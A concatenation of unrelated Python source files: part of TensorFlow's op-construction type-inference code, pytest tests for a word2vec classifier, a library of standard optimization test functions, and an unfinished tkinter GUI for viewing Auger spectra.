# same dtype, try to cast non-Tensor elements to that type.
dtype = None
default_dtype = None
if input_arg.type != types_pb2.DT_INVALID:
dtype = input_arg.type
elif input_arg.number_attr:
if input_arg.type_attr in attrs:
dtype = attrs[input_arg.type_attr]
else:
for t in values:
if isinstance(t, ops.Tensor):
dtype = t.dtype
break
# dtype still not found, prefer using the default dtype
# from the attr.
if dtype is None and input_arg.type_attr in default_type_attr_map:
default_dtype = default_type_attr_map[input_arg.type_attr]
try:
if not input_arg.is_ref and dtype:
dtype = dtypes.as_dtype(dtype).base_dtype
values = ops.internal_convert_n_to_tensor(
values,
name=input_arg.name,
dtype=dtype if dtype else None,
preferred_dtype=default_dtype,
as_ref=input_arg.is_ref)
if input_arg.number_attr and len(
set(v.dtype.base_dtype for v in values)) > 1:
raise TypeError() # All types should match.
except (TypeError, ValueError):
# What types does the conversion function think values have?
observed_types = []
for value in values:
try:
converted_value = ops.convert_to_tensor(
value, as_ref=input_arg.is_ref)
observed_types.append(converted_value.dtype.base_dtype.name)
except (TypeError, ValueError):
observed_types.append("<NOT CONVERTIBLE TO TENSOR>")
observed = ", ".join(observed_types)
prefix = (
"Tensors in list passed to '%s' of '%s' Op have types [%s]" %
(input_name, op_type_name, observed))
if input_arg.number_attr:
if input_arg.type != types_pb2.DT_INVALID:
raise TypeError("%s that do not match expected type %s." %
(prefix, dtype.name))
elif input_arg.type_attr in attrs:
raise TypeError("%s that do not match type %s inferred from "
"earlier arguments." %
(prefix, dtype.name))
else:
raise TypeError("%s that don't all match." % prefix)
else:
raise TypeError(
"%s that are invalid. Tensors: %s" % (prefix, values))
types = [x.dtype for x in values]
inputs.extend(values)
else:
# In cases where we have an expected type, try to convert non-Tensor
# arguments to that type.
dtype = None
default_dtype = None
if input_arg.type != types_pb2.DT_INVALID:
dtype = input_arg.type
elif input_arg.type_attr in attrs:
dtype = attrs[input_arg.type_attr]
elif input_arg.type_attr in default_type_attr_map:
# The dtype could not be inferred solely from the inputs,
# so we prefer the attr's default, so code that adds a new attr
# with a default is backwards compatible.
default_dtype = default_type_attr_map[input_arg.type_attr]
try:
values = ops.convert_to_tensor(
values,
name=input_arg.name,
dtype=dtype,
as_ref=input_arg.is_ref,
preferred_dtype=default_dtype)
except TypeError as err:
if dtype is None:
raise err
else:
raise TypeError(
"Expected %s passed to parameter '%s' of op '%s', got %s of "
"type '%s' instead. Error: %s" %
(dtypes.as_dtype(dtype).name, input_arg.name, op_type_name,
repr(values), type(values).__name__, err))
except ValueError:
# What type does convert_to_tensor think it has?
try:
observed = ops.convert_to_tensor(
values, as_ref=input_arg.is_ref).dtype.name
except ValueError as err:
raise ValueError(
"Tried to convert '%s' to a tensor and failed. Error: %s" %
(input_name, err))
prefix = ("Input '%s' of '%s' Op has type %s that does not match" %
(input_name, op_type_name, observed))
if input_arg.type != types_pb2.DT_INVALID:
raise TypeError("%s expected type of %s." %
(prefix, dtypes.as_dtype(input_arg.type).name))
else:
# Update the maps with the default, if needed.
k = input_arg.type_attr
if k in default_type_attr_map:
if k not in attrs:
attrs[k] = default_type_attr_map[k]
if k not in inferred_from:
inferred_from[k] = "Default in OpDef"
raise TypeError(
"%s type %s of argument '%s'." %
(prefix, dtypes.as_dtype(attrs[input_arg.type_attr]).name,
inferred_from[input_arg.type_attr]))
types = [values.dtype]
inputs.append(values)
base_types = [x.base_dtype for x in types]
if input_arg.number_attr:
# <number-attr> * <type> or <number-attr> * <type-attr>
if input_arg.number_attr in attrs:
if len(values) != attrs[input_arg.number_attr]:
raise ValueError(
"List argument '%s' to '%s' Op with length %d must match "
"length %d of argument '%s'." %
(input_name, op_type_name, len(values),
attrs[input_arg.number_attr],
inferred_from[input_arg.number_attr]))
else:
attrs[input_arg.number_attr] = len(values)
inferred_from[input_arg.number_attr] = input_name
num_attr = _Attr(op_def, input_arg.number_attr)
if num_attr.has_minimum and len(values) < num_attr.minimum:
raise ValueError(
"List argument '%s' to '%s' Op with length %d shorter "
"than minimum length %d." %
(input_name, op_type_name, len(values), num_attr.minimum))
# All tensors must have the same base type.
if any(bt != base_types[0] for bt in base_types):
raise TypeError(
"All tensors passed to '%s' of '%s' Op "
"must have the same type." %
(input_name, op_type_name))
if input_arg.type != types_pb2.DT_INVALID:
# <number-attr> * <type> case
if base_types and base_types[0] != input_arg.type:
assert False, "Unreachable"
elif input_arg.type_attr in attrs:
# <number-attr> * <type-attr> case, where <type-attr> already
# has an inferred value.
if base_types and base_types[0] != attrs[input_arg.type_attr]:
assert False, "Unreachable"
else:
# <number-attr> * <type-attr> case, where we are now setting
# the <type-attr> based on this input
if not base_types:
# If it's in default_type_attr_map, then wait to set it
# (in "process remaining attrs", below).
if input_arg.type_attr not in default_type_attr_map:
raise TypeError(
"Don't know how to infer type variable from empty input "
"list passed to input '%s' of '%s' Op." %
(input_name, op_type_name))
else:
attrs[input_arg.type_attr] = base_types[0]
inferred_from[input_arg.type_attr] = input_name
type_attr = _Attr(op_def, input_arg.type_attr)
_SatisfiesTypeConstraint(base_types[0], type_attr,
param_name=input_name)
elif input_arg.type_attr:
# <type-attr>
attr_value = base_types[0]
if input_arg.type_attr in attrs:
if attrs[input_arg.type_attr] != attr_value:
raise TypeError(
"Input '%s' of '%s' Op has type %s that does not "
"match type %s of argument '%s'." %
(input_name, op_type_name, dtypes.as_dtype(attr_value).name,
dtypes.as_dtype(attrs[input_arg.type_attr]).name,
inferred_from[input_arg.type_attr]))
else:
for base_type in base_types:
_SatisfiesTypeConstraint(base_type,
_Attr(op_def, input_arg.type_attr),
param_name=input_name)
attrs[input_arg.type_attr] = attr_value
inferred_from[input_arg.type_attr] = input_name
elif input_arg.type_list_attr:
# <type-list-attr>
attr_value = base_types
if input_arg.type_list_attr in attrs:
if attrs[input_arg.type_list_attr] != attr_value:
raise TypeError(
"Input '%s' of '%s' Op has type list of %s that does not "
"match type list %s of argument '%s'." %
(input_name, op_type_name,
", ".join(dtypes.as_dtype(x).name for x in attr_value),
", ".join(dtypes.as_dtype(x).name
for x in attrs[input_arg.type_list_attr]),
inferred_from[input_arg.type_list_attr]))
else:
for base_type in base_types:
_SatisfiesTypeConstraint(base_type,
_Attr(op_def, input_arg.type_list_attr),
param_name=input_name)
attrs[input_arg.type_list_attr] = attr_value
inferred_from[input_arg.type_list_attr] = input_name
else:
# single Tensor with specified type
if base_types[0] != input_arg.type:
assert False, "Unreachable"
if input_arg.is_ref:
if not all(x._is_ref_dtype for x in types): # pylint: disable=protected-access
raise TypeError(
("'%s' Op requires that input '%s' be a mutable tensor "
"(e.g.: a tf.Variable)") % (op_type_name, input_name))
input_types.extend(types)
else:
input_types.extend(base_types)
# Process remaining attrs
for attr in op_def.attr:
# Skip attrs that have already had their values inferred
if attr.name in attrs:
if attr.name in keywords:
raise TypeError(
"Should not specify value for inferred attr '%s'." % attr.name)
continue
if attr.name in keywords:
attrs[attr.name] = keywords.pop(attr.name)
elif attr.name + "_" in keywords:
# Attrs whose names match Python keywords have an extra '_'
# appended, so we must check for that as well.
attrs[attr.name] = keywords.pop(attr.name + "_")
elif attr.name in default_type_attr_map:
attrs[attr.name] = default_type_attr_map[attr.name]
inferred_from.setdefault(attr.name, "Default in OpDef")
else:
raise TypeError("No argument for attr " + attr.name)
# Convert attr values to AttrValue protos.
attr_protos = {}
for attr_def in op_def.attr:
key = attr_def.name
value = attrs[key]
attr_value = attr_value_pb2.AttrValue()
if attr_def.HasField("default_value") and value is None:
attr_value.CopyFrom(attr_def.default_value)
attr_protos[key] = attr_value
continue
if attr_def.type.startswith("list("):
if not _IsListValue(value):
raise TypeError("Expected list for attr " + key)
if attr_def.has_minimum:
if len(value) < attr_def.minimum:
raise ValueError("Attr '%s' of '%s' Op passed list of length %d "
"less than minimum %d." %
(key, op_type_name, len(value),
attr_def.minimum))
attr_value.list.SetInParent()
if attr_def.type == "string":
attr_value.s = _MakeStr(value, key)
if attr_def.HasField("allowed_values"):
if attr_value.s not in attr_def.allowed_values.list.s:
raise ValueError(
"Attr '%s' of '%s' Op passed string '%s' not in: \"%s\"." %
(key, op_type_name, compat.as_text(attr_value.s),
'", "'.join(map(compat.as_text,
attr_def.allowed_values.list.s))))
elif attr_def.type == "list(string)":
attr_value.list.s.extend([_MakeStr(x, key) for x in value])
if attr_def.HasField("allowed_values"):
for x in attr_value.list.s:
if x not in attr_def.allowed_values.list.s:
raise ValueError(
"Attr '%s' of '%s' Op passed string '%s' not in: \"%s\"." %
(key, op_type_name, compat.as_text(x),
'", "'.join(map(compat.as_text,
attr_def.allowed_values.list.s))))
elif attr_def.type == "int":
attr_value.i = _MakeInt(value, key)
if attr_def.has_minimum:
if attr_value.i < attr_def.minimum:
raise ValueError(
"Attr '%s' of '%s' Op passed %d less than minimum %d." %
(key, op_type_name, attr_value.i, attr_def.minimum))
elif attr_def.type == "list(int)":
attr_value.list.i.extend([_MakeInt(x, key) for x in value])
elif attr_def.type == "float":
attr_value.f = _MakeFloat(value, key)
elif attr_def.type == "list(float)":
attr_value.list.f.extend([_MakeFloat(x, key) for x in value])
elif attr_def.type == "bool":
attr_value.b = _MakeBool(value, key)
elif attr_def.type == "list(bool)":
attr_value.list.b.extend([_MakeBool(x, key) for x in value])
elif attr_def.type == "type":
attr_value.type = _MakeType(value, attr_def)
elif attr_def.type == "list(type)":
attr_value.list.type.extend(
[_MakeType(x, attr_def) for x in value])
elif attr_def.type == "shape":
attr_value.shape.CopyFrom(_MakeShape(value, key))
elif attr_def.type == "list(shape)":
attr_value.list.shape.extend(
[_MakeShape(x, key) for x in value])
elif attr_def.type == "tensor":
attr_value.tensor.CopyFrom(_MakeTensor(value, key))
elif attr_def.type == "list(tensor)":
attr_value.list.tensor.extend(
[_MakeTensor(x, key) for x in value])
elif attr_def.type == "func":
attr_value.func.CopyFrom(_MakeFunc(value, key))
elif attr_def.type == "list(func)":
attr_value.list.func.extend([_MakeFunc(x, key) for x in value])
else:
raise TypeError("Unrecognized Attr type " + attr_def.type)
attr_protos[key] = attr_value
del attrs # attrs is no longer authoritative, use attr_protos instead
# Determine output types (possibly using attrs)
output_structure = []
for arg in op_def.output_arg:
if arg.number_attr:
n = _AttrValue(attr_protos, arg.number_attr).i
output_structure.append(n)
elif arg.type_attr:
t = _AttrValue(attr_protos, arg.type_attr)
output_structure.append(None)
elif arg.type_list_attr:
t = _AttrValue(attr_protos, arg.type_list_attr)
output_structure.append(len(t.list.type))
else:
output_structure.append(None)
if keywords:
raise TypeError("apply_op() got unexpected keyword arguments: " +
", ".join(sorted(keywords.keys())))
# NOTE(mrry): We add an explicit colocation constraint between
# the newly created op and any of its reference-typed inputs.
must_colocate_inputs = [val for arg, val in zip(op_def.input_arg, inputs)
if arg.is_ref]
with _MaybeColocateWith(must_colocate_inputs):
# Add Op to graph
# pylint: disable=protected-access
op = g._create_op_internal(op_type_name, inputs, dtypes=None,
name=scope, input_types=input_types,
attrs=attr_protos, op_def=op_def)
# `outputs` is returned as a separate return value so that the output
# tensors can the `op` per se can be decoupled so that the
# `op_callbacks` can function properly. See framework/op_callbacks.py
# for more details.
outputs = op.outputs
# Conditionally invoke tfdbg v2's op callback(s).
if op_callbacks.should_invoke_op_callbacks():
callback_outputs = op_callbacks.invoke_op_callbacks(
op.node_def.op, tuple(op.inputs), attr_protos, tuple(outputs),
op_name=op.name, graph=g)
if callback_outputs is not None:
outputs = callback_outputs
return output_structure, op_def.is_stateful, op, outputs
|
|
"""Tests for models.text.py."""
import types
from unittest.mock import patch
import numpy as np
import pytest
class TestW2VClassifier:
@pytest.fixture
def mock_load_w2v_format(self):
word2idx = {'first': 0, 'second': 1, 'third': 2, 'fourth': 3}
syn0 = np.array([
[0.1, 0.1, 0.1],
[10.0, 10.0, 10.1],
[-0.1, -0.1, -0.1],
[-0.1, -0.1, 0.1],
])
return word2idx, syn0
@pytest.fixture
def mock_w2v_classifier_cls(self, mock_load_w2v_format):
"""Return a W2VClassifier with a mocked fit method."""
from dstoolbox.models import W2VClassifier
from dstoolbox.utils import normalize_matrix
# pylint: disable=unused-argument
def mock_fit(self, X=None, y=None):
word2idx, syn0 = mock_load_w2v_format
self.word2idx_ = word2idx
self.classes_ = np.array(sorted(word2idx, key=word2idx.get))
self.syn0_ = normalize_matrix(syn0)
return self
W2VClassifier.fit = types.MethodType(mock_fit, W2VClassifier('a/path'))
return W2VClassifier
@pytest.fixture
def clf(self, mock_w2v_classifier_cls):
return mock_w2v_classifier_cls('a/path').fit()
@staticmethod
def assert_most_similar_are_equal(expected, results, atol=1e-5):
for (r_word, r_simil), (e_word, e_simil) in zip(results, expected):
assert r_word == e_word
assert np.isclose(r_simil, e_simil, atol=atol)
def test_word2vec_classifier_mocked_fit(self, mock_load_w2v_format):
with patch('dstoolbox.models.text.load_w2v_format') as load:
word2idx, syn0 = mock_load_w2v_format
load.return_value = mock_load_w2v_format
from dstoolbox.models import W2VClassifier
from dstoolbox.utils import normalize_matrix
clf = W2VClassifier('a/path')
clf.fit()
assert (clf.syn0_ == normalize_matrix(syn0)).all()
assert clf.word2idx_ == word2idx
assert clf.classes_.tolist() == ['first', 'second',
'third', 'fourth']
def test_word2vec_classifier_fit(self, mock_w2v_classifier_cls):
clf = mock_w2v_classifier_cls.fit()
assert isinstance(clf.word2idx_, dict)
assert isinstance(clf.syn0_, np.ndarray)
assert (clf.classes_ ==
np.array(['first', 'second', 'third', 'fourth'])).all()
@pytest.mark.parametrize('word, expected', [
('first', np.array([[0.1, 0.1, 0.1]])),
('second', np.array([[10.0, 10.0, 10.1]])),
])
def test_word2vec_classifier_get_vector_from_word(
self, clf, word, expected):
from dstoolbox.models.text import normalize_matrix
# pylint: disable=protected-access
result = clf._get_vector_from_word(word)
expected = normalize_matrix(expected).tolist()[0]
assert result.tolist() == expected
@pytest.mark.parametrize('vector', [
np.array([1, 2, 3]),
np.array([[1, 2, 3]])
])
def test_word2vec_classifier_update_vocabulary_vector_1d(
self, clf, vector):
# pylint: disable=protected-access
clf._update_vocabulary('fifth', vector)
assert clf.word2idx_['fifth'] == 4
assert clf.classes_[-1] == 'fifth'
assert (clf.syn0_[-1] == vector).all()
@pytest.mark.parametrize('w1, w2', [
('first', 'second'),
('second', 'third'),
('first', 'fourth'),
])
def test_word2vec_classifier_add_word_vectors(self, clf, w1, w2):
# pylint: disable=protected-access
from dstoolbox.utils import normalize_matrix
result = clf._add_word_vectors([w1, w2])
v1 = clf._get_vector_from_word(w1)
v2 = clf._get_vector_from_word(w2)
expected = normalize_matrix((v1 + v2).reshape(1, -1))
assert (result == expected).all()
def test_word2vec_classifier_get_vector_unknown_word_raises(self, clf):
with pytest.raises(KeyError):
# pylint: disable=protected-access
clf._get_vector_from_word('unknown_word')
def test_word2vec_classifier_kneighbors_no_distances(self, clf):
neighbors = clf.kneighbors(['first'], return_distance=False)
assert neighbors.tolist()[0] == [1, 3, 2]
@pytest.mark.parametrize('word, expected', [
('first', [1, 3, 2]),
('third', [3, 1, 0]),
])
def test_word2vec_classifier_kneighbors_with_distances_top3(
self, clf, word, expected):
neighbors, distances = clf.kneighbors([word])
assert neighbors.tolist()[0] == expected
assert 0 <= distances[0][0] <= distances[0][1] <= distances[0][2]
@pytest.mark.parametrize('word, expected', [
('first', [1, 3]),
('third', [3, 1]),
])
def test_word2vec_classifier_kneighbors_with_distances_top2(
self, clf, word, expected):
neighbors, distances = clf.kneighbors([word], 2)
assert neighbors.tolist()[0] == expected
assert 0 <= distances[0][0] <= distances[0][1]
@pytest.mark.parametrize('word, expected', [
('first', [1]),
('third', [3]),
])
def test_word2vec_classifier_kneighbors_with_distances_top1(
self, clf, word, expected):
neighbors, distances = clf.kneighbors([word], 1)
assert neighbors.tolist()[0] == expected
assert distances[0][0] >= 0
def test_word2vec_classifier_most_similar_multiple_positives(
self, clf):
results = clf.most_similar(positive=['first', 'second'])
expected = [('first', 1.0), ('second', 1.0),
('fourth', 0.33444), ('third', 0.0)]
self.assert_most_similar_are_equal(expected, results)
def test_word2vec_classifier_most_similar_negative_keyword_used(
self, clf):
with pytest.raises(NotImplementedError):
clf.most_similar(positive=['first'], negative=['second'])
def test_word2vec_classifier_most_similar_positive_not_exactly_one_word(
self, clf):
with pytest.raises(ValueError):
clf.most_similar(positive=[])
@pytest.mark.parametrize('word, expected', [
('first', [('second', 1.0),
('fourth', 1.0 / 3.0),
('third', 0.0)]),
('third', [('fourth', 2.0 / 3.0),
('second', 0.0),
('first', 0.0)]),
])
def test_word2vec_classifier_most_similar_top3(self, word, expected, clf):
results = clf.most_similar(word)
self.assert_most_similar_are_equal(expected, results)
@pytest.mark.parametrize('word, expected', [
('first', [('second', 1.0),
('fourth', 1.0 / 3.0)]),
('third', [('fourth', 2.0 / 3.0),
('second', 0.0)]),
])
def test_word2vec_classifier_most_similar_top2(self, word, expected, clf):
results = clf.most_similar(word)
self.assert_most_similar_are_equal(expected, results)
@pytest.mark.parametrize('word, expected', [
('first', 'second'),
('third', 'fourth'),
])
def test_word2vec_classifier_predict_one_sample(self, word, expected, clf):
y_pred = clf.predict([word])
result = clf.classes_[y_pred].tolist()[0]
assert isinstance(y_pred, np.ndarray)
assert y_pred.shape == (1,)
assert result == expected
def test_word2vec_classifier_predict_two_samples(self, clf):
y_pred = clf.predict(['first', 'third'])
result = clf.classes_[y_pred].tolist()
expected = ['second', 'fourth']
assert isinstance(y_pred, np.ndarray)
assert y_pred.shape == (2,)
assert result == expected
def test_word2vec_classifier_predict_proba_raises(self, clf):
with pytest.raises(NotImplementedError):
clf.predict_proba(['first'])
|
|
import sys
import numpy as np
from abc import ABCMeta, abstractmethod
class OptimizationTestFunction:
__metaclass__ = ABCMeta
"""
General class for Test Functions used for optimization
"""
def __init__(self, mindim=1, maxdim=None, domain=np.array([-1, 1])):
self.mindim = mindim
self.maxdim = maxdim
self.domain = domain
@staticmethod
def function(x):
return np.sum(np.abs(x))
@abstractmethod
def minimum(self, ndim):
pass
def fminimum(self, ndim):
x = self.minimum(ndim)
return self.function(x)
def get_plot_matrices(self, shape=None):
if shape is None:
shape = [200, 200]
if self.domain.ndim == 1:
dx = float(self.domain[1] - self.domain[0]) / (shape[0])
X, Y = np.mgrid[self.domain[0]:self.domain[1]:dx, self.domain[0]:self.domain[1]:dx]
else:
dx = float(self.domain[0, 1] - self.domain[0, 0]) / (shape[0])
dy = float(self.domain[1, 1] - self.domain[1, 0]) / (shape[1])
X, Y = np.mgrid[self.domain[0, 0]:self.domain[0, 1]:dx, self.domain[1, 0]:self.domain[1, 1]:dy]
Z = self.function(np.array([X, Y]))
return X, Y, Z
class Sphere(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=1, maxdim=None, domain=np.array([-5, 5]))
@staticmethod
def function(x):
x = np.array(x)
return np.sum(x.T * x.T, axis=-1).T
def minimum(self, ndim):
return np.zeros(ndim)
class Ackley(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=1, maxdim=None, domain=np.array([-5, 5]))
@staticmethod
def function(x):
n = len(x)
exp1 = np.exp(-0.2 * np.sqrt(1.0 / n * np.sum(x * x)))
exp2 = np.exp(1.0 / n * np.sum((np.cos(2 * np.pi * x)).T, axis=-1).T)
return -20 * exp1 - exp2 + np.e + 20
def minimum(self, ndim):
return np.zeros(ndim)
class Rosenbrock(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=1, maxdim=None, domain=np.array([-5, 5]))
@staticmethod
def function(x):
return np.sum((100.0 * (x[1:] - x[:-1] ** 2.0) ** 2.0 + (1 - x[:-1]) ** 2.0).T, axis=-1).T
def minimum(self, ndim):
return np.ones(ndim)
class Beale(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-4.5, 4.5]))
@staticmethod
def function(x):
return (1.5 - x[0] + x[0] * x[1]) ** 2 + (2.25 - x[0] + x[0] * x[1] * x[1]) ** 2 + (2.625 - x[0] + x[0] * x[1] *
x[1] * x[1]) ** 2
def minimum(self, ndim):
assert ndim == 2
return np.array([3.0, 0.5])
class GoldsteinPrice(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-2, 2]))
@staticmethod
def function(x):
factor1 = (19 - 14 * x[0] + 3 * x[0] ** 2 - 14 * x[1] + 6 * x[0] * x[1] + 3 * x[1] ** 2)
factor2 = (18 - 32 * x[0] + 12 * x[0] ** 2 + 48 * x[1] - 36 * x[0] * x[1] + 27 * x[1] ** 2)
return (1 + ((x[0] + x[1] + 1) ** 2) * factor1) * (30 + ((2 * x[0] - 3 * x[1]) ** 2) * factor2)
def minimum(self, ndim):
assert ndim == 2
return np.array([0.0, -1.0])
class Booth(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-10, 10]))
@staticmethod
def function(x):
return (x[0] + 2 * x[1] - 7) ** 2 + (2 * x[0] + x[1] - 5) ** 2
def minimum(self, ndim):
assert ndim == 2
return np.array([1.0, -3.0])
class BukinN6(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([[-15, 15], [-3, 3]]))
@staticmethod
def function(x):
return 100 * np.sqrt(np.abs(x[1] - 0.01 * x[0] ** 2)) + 0.01 * np.abs(x[0] + 10)
def minimum(self, ndim):
assert ndim == 2
return np.array([10.0, 1.0])
class Matyas(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-10, 10]))
@staticmethod
def function(x):
return 0.26 * (x[0] ** 2 + x[1] ** 2) - 0.48 * x[0] * x[1]
def minimum(self, ndim):
assert ndim == 2
return np.array([1.0, 1.0])
class LeviN13(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-10, 10]))
@staticmethod
def function(x):
term1 = (np.sin(3 * np.pi * x[0])) ** 3
term2 = (x[0] - 1) ** 2 * (1 + (np.sin(3 * np.pi * x[1])) ** 3)
term3 = (x[1] - 1) ** 2 * (1 + (np.sin(2 * np.pi * x[1])) ** 2)
return term1 + term2 + term3
def minimum(self, ndim):
assert ndim == 2
return np.array([1.0, 1.0])
class ThreeHump(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-10, 10]))
@staticmethod
def function(x):
return 2 * x[1] ** 2 - 1.05 * x[0] ** 4 + 1.0 / 6.0 * x[0] ** 6 + x[0] * x[1] + x[1] ** 2
def minimum(self, ndim):
assert ndim == 2
return np.array([0.0, 0.0])
class Easom(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-100, 100]))
@staticmethod
def function(x):
return -np.cos(x[0]) * np.cos(x[1]) * np.exp(-1 * ((x[0] - np.pi) ** 2 + (x[1] - np.pi) ** 2))
def minimum(self, ndim):
assert ndim == 2
return np.array([np.pi, np.pi])
class CrossInTray(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-10, 10]))
@staticmethod
def function(x):
factor1 = np.exp(np.abs(100 - np.sqrt(x[0] ** 2 + x[1] ** 2) / np.pi))
return -1E-4 * (np.abs(np.sin(x[0]) * np.sin(x[1]) * factor1) + 1) ** 0.1
def minimum(self, ndim):
assert ndim == 2
return np.array([1.34941, 1.34941])
class Eggholder(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-512, 512]))
@staticmethod
def function(x):
return -1.0 * (x[1] + 47) * np.sin(np.sqrt(np.abs(x[1] + x[0] / 2.0 + 47))) - x[0] * np.sin(
np.sqrt(np.abs(x[0] - x[1] - 47)))
def minimum(self, ndim):
assert ndim == 2
return np.array([512, 404.2319])
class HolderTable(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-10, 10]))
@staticmethod
def function(x):
return -1.0 * np.abs(np.sin(x[0]) * np.cos(x[1]) * np.exp(np.abs(1 - np.sqrt(x[0] ** 2 + x[1] ** 2) / np.pi)))
def minimum(self, ndim):
assert ndim == 2
return np.array([8.05502, 9.664559])
class McCormick(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([[-1.5, 4], [-3, 4]]))
@staticmethod
def function(x):
return np.sin(x[0] + x[1]) + (x[0] - x[1]) ** 2 - 1.5 * x[0] + 2.5 * x[1] + 1
def minimum(self, ndim):
assert ndim == 2
return np.array([8.05502, 9.66459])
class SchafferN2(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-100, 100]))
@staticmethod
def function(x):
return 0.5 + ((np.sin(x[0] ** 2 - x[1] ** 2)) ** 2 - 0.5) / (1 + 1E-3 * (x[0] ** 2 + x[1] ** 2)) ** 2
def minimum(self, ndim):
assert ndim == 2
return np.zeros(2)
class SchafferN4(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-100, 100]))
@staticmethod
def function(x):
return 0.5 + ((np.cos(np.sin(np.abs(x[0] ** 2 - x[1] ** 2)))) ** 2 - 0.5) / (1 + 1E-3 * (
x[0] ** 2 + x[1] ** 2)) ** 2
def minimum(self, ndim):
assert ndim == 2
return np.array([0, 1.25313])
class StyblinskiTang(OptimizationTestFunction):
def __init__(self):
OptimizationTestFunction.__init__(self, mindim=1, maxdim=None, domain=np.array([-5, 5]))
@staticmethod
def function(x):
return np.sum((x ** 4 - 16 * x ** 2 + 5 * x).T, axis=-1).T / 2.0
def minimum(self, ndim):
return -2.903534 * np.ones(ndim)
# class Simionescu(OptimizationTestFunction):
#
# def __init__(self):
# OptimizationTestFunction.__init__(self, mindim=2, maxdim=2, domain=np.array([-1.25, 1.25]))
#
# @staticmethod
# def function(x):
# rt = 1
# rs = 0.2
# n = 8
# return np.piecewise(x,
# [x[0]**2 + x[1]**2 <= (rt + rs*np.cos(n*np.arctan(x[0]/x[1])))**2,
# x[0]**2 + x[1]**2 > (rt + rs*np.cos(n*np.arctan(x[0]/x[1])))**2], [0.1*x[0]*x[1], 1])
#
#
# def minimum(self, ndim):
# assert ndim == 2
# return -0.84852813*np.ones(ndim)
def all_tests_functions():
current_module = sys.modules[__name__]
f = current_module.__dict__
return [f[x]() for x in f if hasattr(f[x], '__base__') and f[x].__base__ == OptimizationTestFunction]
|
|
'''
This is intended to be a plot interface w/
1)filenumber/filename text string filter (allowing update of current Augerfile)
2) adjustable charging energy value,
3) comparison of data with plotted line energies (including shift),
entry for element list?
'''
import tkinter as tk
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import random
# need to load AESdataset class from Auger_shift_pyqt
os.chdir('H:\Research_data\Miscellaneous\Auger\PH_NWA')
def AESgui():
''' Launcher function for Auger quantmap GUI '''
root = tk.Tk()
root.wm_title("Auger spectra explorer")
GUIMain(root)
root.mainloop()
return
class GUIMain():
''' Main container for plotter, options (at right), and fileloader (bottom)
pass current working directory as default directory '''
def __init__(self,root):
self.root = root
self.root.wm_title("Auger quant map")
self.plots_frame = tk.Frame(self.root)
self.plots_frame.pack(side=tk.TOP)
self.spec_frame = tk.Frame(self.plots_frame)
self.spec_frame.pack(side=tk.LEFT)
self.roi_frame = tk.Frame(self.root)
self.roi_frame.pack(side=tk.TOP)
self.specviewer= SpectraViewer(self.spec_frame,self)
self.opts = GUIopts(self.roi_frame,self)
# Menubars
self.menubar=tk.Menu(self.root)
filemenu = tk.Menu(self.menubar, tearoff=0)
filemenu.add_command(label="Load AES files", command=self.load_AESfiles)
filemenu.add_command(label="Save", command=lambda:
self.args_popup_menu({'command':'save','radio':[]}))
filemenu.add_command(label="Exit", command=self.on_quitapp)
self.menubar.add_cascade(label="File", menu=filemenu)
self.root.config(menu=self.menubar)
specmenu = tk.Menu(self.menubar, tearoff=0)
# finds negative peaks in sm-diff spectrum for active (checked) elements
specmenu.add_command(label="Find all peaks (deriv + integ) ", command=self.rois.find_all_peaks)
specmenu.add_command(label="Uniform filter", command=lambda:
self.args_popup_menu({'command':'uniform filter', 'entries':[['filter size',1]]}))
specmenu.add_command(label="Mask ", command=lambda:
self.args_popup_menu({'command':'uniform filter', 'entries':[['filter size',1]]}))
self.menubar.add_cascade(label="Spectral Commands", menu=specmenu)
self.root.config(menu=self.menubar)
def on_quitapp(self):
msg = "Quitting:\nUnsaved progress will be lost.\nDo you wish to Continue?"
if tkmess.askokcancel("Quantmap",msg):
self.root.destroy()
def load_AESfile(self):
''' Load standard Auger dataset file using directory
'''
fullpath= filedialog.askopenfilename(title='Select pixarray file',
filetypes=[("pix array","*.csv")])
(directory, filename)=os.path.split(fullpath)
print('Directory is', directory)
self.opts.open_AESfile(directory)
def args_popup_menu(self, kwargs):
''' Menu launched top-level window to get entered args/kwargs entry and
then call GUIrois method (home of QMfile data object and other assorted methods)
kwargs: command - name of desired method
param name & associated value (e.g. kwargs={'filter size':1})
implement radiobuttons using 'radio':['plottype',['scatter','line']]
implement checkbuttons using 'check':['add backfit',True]
implement entries using 'entry':['filter size',1]
'''
def abort():
t.destroy()
def runcmd():
''' run command w/ entered args/kwargs '''
# Construct args, kwargs for method call
myargs={}
for i, (key, val) in enumerate(kwargs.items()):
if key!='command':
myargs.update({val[0], tkvars[i].get()})
else:
myargs.update({'command', kwargs.get('command')})
self.rois.runcmd(myargs)
t.destroy()
t = tk.Toplevel(self.root) # open new toplevel window
tkvars=[] # Display and alter params passed in kwargs
bottomframe=tk.Frame(t)
